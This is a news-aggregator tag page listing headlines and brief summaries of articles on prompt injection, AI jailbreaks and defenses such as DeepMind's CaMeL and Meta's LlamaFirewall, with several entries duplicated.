#prompt-injection

[ follow ]
fromHackernoon
3 weeks ago

The Prompt Protocol: Why Tomorrow's Security Nightmares Will Be Whispered, Not Coded | HackerNoon

The shift in cybersecurity is not only about technical exploits but also about vulnerabilities that emerge through clever phrasing and conversation with AI systems.
Privacy professionals
#ai
Artificial intelligence
fromTechzine Global
1 month ago

Zero-click attack reveals new AI vulnerability

Echoleak exposes vulnerabilities in AI assistants like Microsoft 365 Copilot through subtle prompt manipulation, representing a shift in cybersecurity attack vectors.
Artificial intelligence
fromArs Technica
3 months ago

Researchers claim breakthrough in fight against AI's frustrating security hole

Prompt injections jeopardize AI systems; Google DeepMind's CaMeL offers a potential solution by treating language models as untrusted components within security frameworks.
Artificial intelligence
fromTechzine Global
1 month ago

Zero-click attack reveals new AI vulnerability

Echoleak exposes vulnerabilities in AI assistants like Microsoft 365 Copilot through subtle prompt manipulation, representing a shift in cybersecurity attack vectors.
Artificial intelligence
fromArs Technica
3 months ago

Researchers claim breakthrough in fight against AI's frustrating security hole

Prompt injections jeopardize AI systems; Google DeepMind's CaMeL offers a potential solution by treating language models as untrusted components within security frameworks.
#ai-security
fromInfoQ
2 months ago
Artificial intelligence

Meta Open Sources LlamaFirewall for AI Agent Combined Protection

fromInfoQ
3 months ago
Artificial intelligence

DeepMind Researchers Propose Defense Against LLM Prompt Injection

Artificial intelligence
fromFuturism
3 months ago

Researchers Find Easy Way to Jailbreak Every Major AI, From ChatGPT to Claude

A newly discovered jailbreak can manipulate AI models into producing harmful content, exposing vulnerabilities in their safety measures.
Growth hacking
fromArs Technica
4 months ago

Gemini hackers can deliver more potent attacks with a helping hand from... Gemini

Indirect prompt injections are an effective method for exploiting large language models, revealing vulnerabilities in AI systems.
fromInfoQ
2 months ago
Artificial intelligence

Meta Open Sources LlamaFirewall for AI Agent Combined Protection

Artificial intelligence
fromInfoQ
3 months ago

DeepMind Researchers Propose Defense Against LLM Prompt Injection

Google DeepMind's CaMeL effectively neutralizes 67% of prompt injection attacks in LLMs using traditional software security principles.
Artificial intelligence
fromFuturism
3 months ago

Researchers Find Easy Way to Jailbreak Every Major AI, From ChatGPT to Claude

A newly discovered jailbreak can manipulate AI models into producing harmful content, exposing vulnerabilities in their safety measures.
Growth hacking
fromArs Technica
4 months ago

Gemini hackers can deliver more potent attacks with a helping hand from... Gemini

Indirect prompt injections are an effective method for exploiting large language models, revealing vulnerabilities in AI systems.
fromHackernoon
1 year ago

Prompt Injection Is What Happens When AI Trusts Too Easily | HackerNoon

Generative AI is becoming essential in daily life, but it poses significant security threats like prompt injection, which can manipulate AI systems.
[ Load more ]